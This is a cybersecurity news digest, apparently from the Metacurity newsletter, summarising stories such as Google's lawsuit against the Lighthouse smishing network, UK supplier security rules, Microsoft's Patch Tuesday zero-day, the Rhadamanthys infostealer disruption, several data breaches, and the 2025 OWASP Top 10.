Google sues Chinese smishing giant Lighthouse Enterprise for scams across 120 countries

Get your message, announcement, or white paper in front of thousands of cyber leaders, policy makers, and decision-makers for little more than the cost of an annual Metacurity subscription. Click the button below to find out more about our sponsorship options.

In one of the most high-profile actions against Chinese cyberscammers so far, Google is suing alleged members of one “relentless” Chinese smishing group called the Lighthouse Enterprise that it claims has tried to con people in more than 120 countries around the world.

In a civil lawsuit filed today in the US Southern District of New York, Google alleges that 25 unnamed individuals have operated as part of the “Lighthouse” scam network and targeted millions of Americans with texts in a “staggering” operation.

As well as “stealing” information and money, Lighthouse also “preys on the public trust in Google” by using its logos on fraudulent websites and abusing its systems and technology, the company’s lawsuit claims. “With the rise in scams, it’s largely due to the action of organized crime networks, and most of them are transnational,” Halimah DeLaine Prado, general counsel at Google, alleges. “The Lighthouse network has an enormous reach.”

Central to the Lighthouse operation is its scamming software, called Lighthouse. Cybercriminals developed this software and then sold it as a subscription service to less technically capable fraudsters who use it to send the scam text messages. Scammers can purchase “weekly, monthly, seasonal, annual, or permanent” subscriptions to use the software, Google’s lawsuit claims.

According to Google, the scam exploits the reputations of its own and other brands by illegally displaying our trademarks and services on fraudulent websites. We found at least 107 website templates featuring Google's branding on sign-in screens specifically designed to trick people into believing the sites are legitimate.

Google’s lawsuit against two dozen individuals it says it has linked to the Lighthouse operation alleges how the broader network is made up of several types of cybercriminals: data brokers, who provide lists of people to target with scams; spammers, who provide the tech needed to send messages en masse; a theft group of individuals using stolen account details to access victims’ bank accounts; and administrators who organize the groups. The lawsuit claims the 25 individuals it is targeting have all “participated in the management or operation” of the Lighthouse scheme.

Lighthouse “offers” more than 600 phishing templates that scammers can use to try to steal people’s personal information, Google’s legal filing says. These impersonate more than 400 entities or organizations, the firm says in its lawsuit.

Google claims Lighthouse has harmed over 1 million victims across more than 120 countries, stealing somewhere between 12.7 million and 115 million credit cards in the US alone, representing a five-fold increase in these types of attacks since 2020.

Google cited data from cyber security company Silent Push alleging that in a 20-day period this year a Chinese criminal group called “Smishing Triad” used Lighthouse to make 200,000 fraudulent websites, which received 50,000 visits a day helping compromise millions of US credit cards. (Matt Burgess / Wired)

Related: Google, NPR, CNBC, Financial Times, The Verge, Ars Technica, CBS News

Britain plans to strengthen its public services' defenses against cyberattacks, requiring companies that provide services to private and public sector organisations, such as the National Health Service, to meet strict security standards.

In 2024, hackers breached the Ministry of Defence's payroll system, and other recent attacks included one that disrupted over 11,000 NHS medical appointments and procedures.

The proposals also follow a series of cyberattacks in recent months that disrupted some of Britain's biggest brands, including Marks & Spencer, the Co-op, and Jaguar Land Rover. Under the proposed laws, medium and large companies providing services such as IT management, help desk support, and cybersecurity to both private and public sector organisations would be regulated, the government said.

If approved, the proposals would require companies to promptly report significant or potentially significant cyber incidents to both the government and their customers, and to have robust plans in place to manage the consequences.

Regulators would gain new powers to designate critical suppliers to essential services, and there would be stricter penalties for serious breaches, the UK's Department for Science, Innovation and Technology (DSIT) said.

The government has also set out plans to ban public sector bodies and operators of critical national infrastructure, including the NHS, local councils, and schools, from paying ransom demands to cybercriminals. (Catarina Demony / Reuters)

Related: Bloomberg, GOV.UK, GOV.UK, Invezz, The Cyber Express, UKAuthority

The UK government will allow tech firms and child safety charities to proactively test artificial intelligence tools to make sure they cannot create child sexual abuse imagery.

An amendment to the Crime and Policing Bill announced on Wednesday would enable "authorised testers" to assess models for their ability to generate illegal child sexual abuse material (CSAM) before their release.

Technology Secretary Liz Kendall said the measures would "ensure AI systems can be made safe at the source" - though some campaigners argue more still needs to be done.

It comes as the Internet Watch Foundation (IWF) said the number of AI-related CSAM reports had doubled over the past year. (Liv McMahon / BBC News)

Related: GOV.UK

Mike Burgess, the director general of security for the Australian Security Intelligence Organisation, said hackers working for China's government and military had probed the country's telecoms network and key infrastructure, warning against the risk of economic disruption from sabotage.

Burgess aid said the espionage was estimated to have cost the country A$12.5 billion ($8.1 billion) last year.

That included the loss of A$2 billion in trade secrets and intellectual property, he told a business conference in Melbourne.

Burgess highlighted the threat of cyber sabotage, describing the activities of the Chinese hacking groups Salt Typhoon and Volt Typhoon, which he described as "hackers working for Chinese government intelligence and their military."

He added, "We have seen Chinese hackers probing our critical infrastructure as well."In Beijing, a foreign ministry spokesperson said Burgess's remarks "spread false narratives and deliberately provoked confrontation." (Kirsty Needham / Reuters)

Related: Livemint, ABC, Australian Financial Review, BBC News, The Guardian, China Daily, Techwire Asia, StratNews Global, Times of India, Financial Review, The Nightly, Sydney Morning Herald, 9News, Brisbane Times, StratNews Global

China's National Computer Virus Emergency Response Center accused the US government of orchestrating the theft of about $13 billion worth of Bitcoin from the LuBian Bitcoin mining pool that took place in December 2020.

The hack is likely a “state-level hacker operation” led by the US, according to the cybersecurity agency, which said the quiet and delayed movement of the stolen Bitcoin suggests a government-level action rather than typical criminal behavior.

An agency report links the stolen Bitcoin from LuBian, once one of the most significant Bitcoin mining operations in the world, with tokens that were confiscated by the US government, which the US said are associated with Chen Zhi, the chairman of the Cambodian conglomerate Prince Group. Chen was charged by the US with engaging in a wire-fraud conspiracy and operating a money-laundering scheme in October.

In an Oct. 8 indictment filed against Chen in New York, the US alleged that he and co-conspirators laundered illicit proceeds by using them to fund “large-scale” crypto mining operations, including LuBian. The indictment said addresses associated with LuBian “received large sums of cryptocurrency from sources unrelated to new mining.” (Muyao Shen and Patrick Howell O'Neill / Bloomberg)

Related: National Computer Virus Emergency Response Center, The Cyber Express, Nikkei Asia, NewsBTC, Cryptonews, Bitcoin Magazine, The Block, BeInCrypto, Decrypt, The Coin Republic, Coinpedia Fintech News, Blockonomi, The Register

Google is rolling out a new cloud-based platform called Private AI Compute that lets users unlock advanced AI features on their devices while keeping data private.

The feature, virtually identical to Apple’s Private Cloud Compute, comes as companies reconcile users’ demands for privacy with the growing computational needs of the latest AI applications.

Many Google products run AI features like translation, audio summaries, and chatbot assistants, on-device, meaning data doesn’t leave your phone, Chromebook, or whatever it is you’re using. This isn’t sustainable, Google says, as advancing AI tools need more reasoning and computational power than devices can supply.

The compromise is to ship more difficult AI requests to Private AI Compute, which it describes as a “secure, fortified space” offering the same degree of security you’d expect from on-device processing. Sensitive data is available “only to you and no one else, not even Google.” (Robert Hart / The Verge)

Related: The Keyword, 9to5Google, Ars Technica, SiliconANGLE, Tech Times, Digital Trends, Droid Life, Sherwood News, Mashable, Android Authority, WinBuzzer, CyberInsider, Moneycontrol, Neowin, Digit, r/artificial, r/GooglePixel, Slashdot

Microsoft issued its latest Patch Tuesday update, which includes security updates for 63 flaws, including one actively exploited zero-day vulnerability.

It also addresses four "Critical" vulnerabilities, two of which are remote code execution vulnerabilities, one is an elevation of privileges, and the fourth is an information disclosure flaw.

The exploited zero day is CVE-2025-62215, a Windows Kernel Elevation of Privilege Vulnerability. Microsoft says that the flaw requires an attacker to win a race condition, upon which they receive SYSTEM privileges.

Microsoft attributed the flaw's discovery to Microsoft Threat Intelligence Center (MSTIC) & Microsoft Security Response Center (MSRC) but has not shared how the flaw was exploited.

Tuesday was also the first extended security update (ESU) for Windows 10, so if you are still utilizing the unsupported operating system, it is strongly advised that you upgrade to Windows 11 or enroll in the ESU program. (Lawrence Abrams / Bleeping Computer)

Related: WinBuzzer, Security Affairs, CSO Online, Zero Day Initiative, Security Week, Windows Central, Rapid7, SANS Internet Storm Center, Ask Woody, CyberScoop, The Stack, Bleeping Computer, PCMag, Windows Latest, How-to-Geek, Windows Report

Google was accused in a lawsuit of using its Gemini AI assistant to unlawfully track the private communications of users of its Gmail, instant messaging, and videoconference programs.

In the past, users of Gmail, Chat, and Meet were given the option to turn on Google’s artificial intelligence program. But in October, the Alphabet Inc. unit “secretly” turned on Gemini for all those applications, enabling it to collect private data “without the users’ knowledge or consent,” according to the complaint, Thele v. Google LLC, 25-cv-09704, filed in federal court in San Jose, California.

While the company allows users to turn off Gemini, they need to dig into Google’s privacy settings to deactivate the AI tool, according to the proposed class-action suit. Unless they take that step, Google uses Gemini to “access and exploit the entire recorded history of its users’ private communications, including literally every email and attachment sent and received in their Gmail accounts,” according to the complaint.

The suit alleges that Google is violating the California Invasion of Privacy Act, a 1967 law that prohibits surreptitious wiretapping and recording of confidential communications without the consent of all parties involved. (Robert Burnson / Bloomberg)

Related: Republic World, The Statesman, Moneycontrol

The Rhadamanthys infostealer operation has been disrupted, likely by law enforcement, with numerous “customers” of the malware-as-a-service reporting that they no longer have access to their servers.

Rhadamanthys is an infostealer malware that steals credentials and authentication cookies from browsers, email clients, and other applications. It is commonly distributed through campaigns promoted as software cracks, YouTube videos, or malicious search advertisements.

According to cybersecurity researchers known as g0njxa and Gi7w0rm, who both monitor malware operations like Rhadamanthys, report that cybercriminals involved in the operation claim that law enforcement gained access to their web panels.

In a post on a hacking forum, some customers state that they lost SSH access to their Rhadamanthys web panels, which now require a certificate to log in rather than their usual root password.

A message from the Rhadamanthys developer says they believe German law enforcement is behind the disruption, as web panels hosted in EU data centers had German IP addresses logging in before the cybercriminals lost access.

Multiple researchers believe this disruption could be related to an upcoming announcement from Operation Endgame, an ongoing law enforcement action targeting malware-as-a-service operations.

Operation Endgame has been behind numerous disruptions since it launched, including against ransomware infrastructure, and the AVCheck site, SmokeLoader, DanaBot, IcedID, Pikabot, Trickbot, Bumblebee, Smokeloader, and SystemBC malware operations.

The Operation Endgame website currently has a timer stating that new action will be disclosed on Thursday. (Lawrence Abrams / Bleeping Computer)

NAS device company Synology addressed a critical-severity remote code execution (RCE) vulnerability in BeeStation products that was demonstrated at the recent Pwn2Own hacking competition.

The security issue (CVE-2025-12686) is described as a ‘buffer copy without checking the size of input’ problem, and can be exploited to allow arbitrary code execution.

It impacts multiple versions of BeeStation OS, the software powering Synology’s network-attached storage (NAS) devices marketed as a consumer-oriented “personal cloud.”

There are no mitigations available, so the vendor recommends that users upgrade to new versions. (Bill Toulas / Bleeping Computer)

Related: Synology, eSecurity Planet, Hong Kong CERT

Hyundai is alerting millions of customers about a data breach that exposed Social Security numbers and driver's licenses.

The breach, which occurred in February but is only now being disclosed, represents the automotive giant's third major security incident in as many years.

Between February 22 and March 2 of this year, hackers broke into these systems and roamed freely for nine days before being detected.

The company discovered the intrusion on March 1st and says it immediately kicked the attackers out and brought in cybersecurity forensics teams. But the investigation took months, and notification letters are now being sent out to those confirmed to be affected: more than seven months after the attack ended. (Lars Daniel / Forbes)

Related: California Attorney General's Office, Car and Driver, Kelley Blue Book, The Drive, Jalopnik

Amazon became the latest company to open its large language models to outside security researchers, announcing the creation of a new bug bounty program for the tech giant’s AI tools with a maximum payout of $25,000 for critical bugs.

The program will allow select third-party researchers and academic teams to prod NOVA, Amazon’s suite of foundational AI models, and receive compensation for their findings. It will cover a range of common vulnerabilities that affect most generative AI systems: prompt injection, jailbreaking, and vulnerabilities within the model that have “real-world exploitation potential.”

Researchers will also look at how the models could be manipulated to assist in the production of chemical, biological, radiological, and nuclear weapons. (Derek B. Johnson / CyberScoop)

Related: Amazon, HackerOne

In a filing with Maine's Attorney General, digital engineering outfit GlobalLogic says personal data from more than 10,000 current and former employees was exposed in the wave of Oracle E-Business Suite (EBS) attacks attributed to the Clop ransomware gang.

The US-based GlobalLogic said that 10,471 individuals were affected after criminals gained unauthorized access to its systems.

In notification letters sent to those impacted, GlobalLogic admitted the stolen data included names, addresses, Social Security numbers, passport information, and bank account details.

GlobalLogic said its investigation identified the earliest date of criminal activity as July 10, 2025, with the most recent occurring on August 20, 2025. This aligns with findings from Google Threat Intelligence Group (GTIG) and Mandiant, which said that suspicious HTTP traffic targeting Oracle EBS servers began in early July. (Carly Page / The Register)

Related: CyberScoop, Bleeping Computer

The Open Worldwide Application Security Project (OWASP) just published its top 10 categories of application risks for 2025, its first list since 2021. It found that while broken access control remains the top issue, security misconfiguration is a strong second, and software supply chain issues are still prominent.

The update was presented at the organization's Global AppSec USA event. The list is final, but the official write-up is in preview, according to OWASP Top 10 co-leads Neil Smithline and Tanya Janca.

The categories are inevitably imprecise and have been updated for 2025. Software supply chain failures are new, replacing one called "vulnerable and outdated components." Server-side request forgery (SSRF) has been merged with broken access control. A new category has been added for "mishandling of exceptional conditions."

Broken access control is "hands down the #1 category for web apps, APIs, and many other digital systems," according to Smithline and Janca. It impacts 3.73 percent of applications tested. Errors in this category include bypassing access control through URL tampering, APIs with missing access controls, guessing URLs to privileged pages as a standard user, or any violation of the principle of least privilege.

Security misconfiguration is second, and would be top for cloud and infrastructure security, Smithline and Janca said in their presentation. It has risen in the list because of an engineering trend to base security more on configuration than on other methods, OWASP states.

Supply chain failures are third, despite having relatively few occurrences, because issues of this kind have "the highest average exploit and impact scores from CVEs [Common Vulnerabilities and Exposures]", OWASP reports. (Tim Anderson / The Register)

Related: OWASP, Security Week, Red Hot Cyber, Dark Reading, SC Media

Manassas City Public Schools (MCPS) were closed on Monday due to a cybersecurity incident that has led to connectivity disruptions and phone outages across the school system, officials said.

Dr. Kevin Newman, MCPS superintendent, said in a post on Facebook on Sunday that all MCPS schools will be closed on Monday, November 10, as a precautionary measure to ensure the safety and security of students, teachers, and staff. The school campuses are not at risk, he said.

Tuesday, November 11, was a previously scheduled holiday, and schools are expected to reopen on Wednesday, November 12. (Alan Henney / WJLA)

Related: WUSA, Inside NoVA, Potomac Local News, Prince William Times, DC News Now, Patch

Dutch government bodies were unpleasantly surprised by news that an American tech firm has acquired the Dutch cloud company Solvinity, the Financieele Dagblad reported.

Several governments had opted for working with Solvinity precisely to reduce dependence on American technology firms.

Solvinity works primarily for Dutch government bodies and provides cloud services. The company is involved in managing DigiD and MijnOverheid, among other things. It also provides secure internet access to the Ministry of Justice and Security. The municipality of Amsterdam recently partnered with Solvinity, partly because it wasn’t in American hands. The Dutch Gambling Authority is also a client.

Last week, the American tech company Kyndryl announced it was acquiring Solvinity for an undisclosed amount, proving that even opting for non-American service providers is not a guarantee. The Ministry of Justice and Security told FD that it was investigating “the possible consequences for our collaboration.” Amsterdam said it was “unpleasantly surprised.” (NL Times)

Related: Financieele Dagblad, Dutch News, Innovation Origins

Iran said it had broken up a spy network linked to both Israeli and US spy agencies, months after the war between the Islamic Republic and its archenemy, Israel.

“An anti-security network led by the US and Israeli intelligence services was identified inside the country and dismantled after several stages of observation, surveillance, and other intelligence measures,” the intelligence organization of the Revolutionary Guards said.

“The operation was carried out in a coordinated manner in a number of provinces,” the Islamic Revolutionary Guard Corps (IRGC), the ideological arm of Iran’s military, said in a statement carried by state television.

It did not provide any details on the time or the location of the crackdown, nor the number of arrests. (AFP)

Related: New Arab

Cybersecurity researchers at Veracode thought they discovered a malicious npm campaign that was aimed at stealing critical credentials from GitHub’s own code base, but GitHub confirmed that the npm packages referenced in Veracode’s report were not part of a real malicious campaign but rather a controlled exercise conducted by GitHub’s internal Red Team.

The activity was designed to evaluate internal detection and response capabilities. Veracode’s blog has since been updated to reflect this clarification.

The fake code package was set up to launch a dangerous sequence immediately after installation. It contained a post-install hook (basically a special script) that would download and run malware to steal GitHub tokens. (Deeba Ahmed / HackRead)

Related: Veracode, InfoWorld

Best Thing of the Day: Time to Examine the CBO Hack

Now that the US government is open, the House Committee on the Budget will be holding a hearing on oversight of the Congressional Budget Office (CBO), during which a recent and ongoing foreign threat attack on CBO will likely be a central topic.

Bonus Best Thing of the Day: An Homage to an Iconic Computer Magazine

Software engineer Hector Dearman released a visualizer to take in all of iconic and now defunct BYTE magazine's 287 issues as one giant zoomable map.

Extra Bonus Best Thing of the Day: Helping Those With Nest Devices Abandoned by Google

Cody Kociemba, the developer behind the Hack/House project, has taken it upon himself to maintain aging and now-discontinued Nest devices through a solution called "No Longer Evil," or “NLE” for short.

Worst Thing of the Day: Why Hack When You Can Wait for Employees to Use AI?

According to LayerX's latest Browser Security Report 2025, 77% of employees paste data into AI prompts, and 32% of all copy-pastes from corporate accounts to non-corporate accounts occur within genAI tools.

Worst Thing of the Day: When Cyberattacks Damage GDP

The Bank of England reports that the cyberattack against British car manufacturer Jaguar Land Rover, the country’s largest automaker, has been so catastrophic that it put a dent in the UK's gross domestic product.

Bonus Worst Thing of the Day: What Does This Have to Do With Protecting Children?

The UK's communications regulator, Ofcom, is using an unnamed third-party tool to monitor VPN use in the UK under Britain's push to supposedly protect children online.

Extra Bonus Worst Thing of the Day: Yes, We Know

As anyone in cybersecurity should know by now, online age checking is creating a treasure trove of data for hackers

Closing Thought